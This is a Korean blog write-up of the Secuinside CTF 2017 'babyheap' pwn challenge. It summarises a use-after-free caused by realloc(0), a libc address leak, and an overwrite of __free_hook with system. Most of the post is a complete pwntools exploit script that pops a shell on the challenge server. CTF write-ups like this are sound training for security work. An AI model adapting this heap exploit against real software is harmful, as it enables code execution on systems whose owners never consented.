## Secuinside CTF_2017(babyheap, pwn)
[Summary]
1. realloc(0)이 free()역할을 하는 점을 이용한 UAF 취약점
2. 멤버를 0xff, 0x1만큼 추가하여 0xff만큼 할당시킨 후 realloc(0)이 되게 만들어 free()를 한다.
3. 팀을 0x7f8(0xff * 0x8)의 크기로 create하면 2번에서 free된 자리에 할당된다.
(이 때 팀의 description에는 __free_got주소를 넣는다.)
4. manage_member 기능을 활용하여 0x7f8의 0번째에 system함수주소를 덮어씌운다.(UAF)
(__free_got주소안에 system함수 주소를 넣는다.)
5. delete member기능을 이용하여 free()를 하면 system('/bin/sh')이 실행된다.
(이 때 멤버의 description에는 "/bin/sh\x00"문자열이 들어있어야 한다.)
6. Leak은 팀을 생성한 후 멤버를 0xff만큼 추가하고 멤버 한명을 삭제하면
fd,bk쪽에 빈리스트의 주소가 저장되는데 이를 릭한 후 오프셋 계산을 통해 libc base를 계산한다.
(마찬가지로 system주소, __free_got도 계산)
7. Heap Leak도 할 수 있지만 여기서는 필요 없다.
[Analysis]
시간 나면 업데이트 예정..(근데 summary에 너무 자세하게 설명했다.)
이 문제는 대회때는 Heap 주소 릭까지만 하고 그 이후는 진전이 없었던 문제이다. 대회가 끝난 후 WriteUp을
참고하여 문제를 풀 수 있었다. 열심히 공부해야겠다..
[Exploit Code] - babyheap_exploit.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 | from pwn import * import os #import hexdump context(arch='amd64',os='linux') local=True #local=False if local: #env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} p = process("./babyheap") else: p = remote("13.124.157.141", 31337) binary = ELF("./babyheap") raw_input() def print_menu(): print p.recvuntil('>') def create_team(length, desc): print_menu() p.send('1\n') print p.recvuntil('length :') p.send(length+'\n') print p.recvuntil('Description :') p.send(desc) def manager_team(index): print_menu() p.send('3\n') print p.recvuntil('Index :') p.send(index+'\n') def list_team(team_cnt): print_menu() p.send('4\n') for i in xrange(team_cnt): print p.recvuntil('Description : ') if (i+1) == team_cnt: leak = p.recv(6); print leak return leak def add_member(employment_cnt): print_menu() p.send('1\n') print p.recvuntil('employment :') p.send(employment_cnt+'\n') def add_member_info(name, desc): print p.recvuntil('Name :') p.send(name) print p.recvuntil('Description :') p.send(desc) def delete_member(index): print_menu() p.send('2\n') print p.recvuntil('Index :') p.send(index+'\n') def manage_member(index, desc): print_menu() p.send('4\n') print p.recvuntil('Index :') p.send(index+'\n') print p.recvuntil('Description :') p.send(desc) def return2team(): print_menu() p.send('5\n') if __name__ == '__main__': #################### Stage 1 ################### # libc base leak & calc libc's free_hook # ################################################ create_team(str(5), 'AAAA') # 0 team manager_team('0') emp_cnt = 0xff add_member(str(emp_cnt)) for i in xrange(emp_cnt): add_member_info('/bin/sh\x00','/bin/sh\x00') delete_member('0') return2team() create_team(str(0xc8), '\n') # 1 team+0x16~ : free list's addr libc_leak = u64(list_team(2)+"\x00\x00"); print hex(libc_leak) libc_base = libc_leak - 0x3c270a free_hook = libc_base + 0x3c4a10 system = libc_base + 0x46590 print "[+] libc base addr : " + hex(libc_base) print "[+] libc free_hook : " + hex(free_hook) print "[+] system addr : " + hex(system) ################### Stage 2 #################### # overwrite __free_hook to system using UAF # ################################################ manager_team('0') add_member('1') # realloc(0) => free() return2team() create_team(str(0x7f8), p64(free_hook)+'\n') # 0xff*0x8 = 0x7f8 => uaf manager_team('0') manage_member('0', p64(system)) # overwrite free_hook to system(uaf) delete_member('4') # triggering to free(overwritten system) p.interactive() | cs |
'CTF writeup' 카테고리의 다른 글
| [Secuinside CTF_2017] snake(reversing) (0) | 2017.07.22 |
|---|---|
| [Secuinside CTF_2017] TrippleRotate(reversing) (0) | 2017.07.22 |
| [Codegate CTF_2017] EasyCrack 101(reversing) (0) | 2017.02.19 |
| [Codegate CTF_2017] angrybird(reversing) (0) | 2017.02.19 |
| [Codegate CTF_2017] RamG-thunder(reversing) (2) | 2017.02.19 |
